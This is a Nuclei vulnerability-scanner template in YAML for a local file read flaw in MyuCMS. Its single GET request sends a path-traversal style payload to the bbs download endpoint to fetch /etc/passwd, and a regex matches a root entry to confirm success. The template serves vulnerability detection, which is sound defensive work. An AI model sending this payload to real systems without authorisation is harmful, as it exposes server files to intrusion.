nuclei-templates/vulnerabilities/other/myucms-lfr.yaml

19 lines
391 B
YAML

id: myucms-lfr
info:
name: MyuCMS Local File Read
author: princechaddha
severity: high
reference:
- https://blog.csdn.net/yalecaltech/article/details/104908257
tags: myucms,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
matchers:
- type: regex
regex:
- "root:.*:0:0:"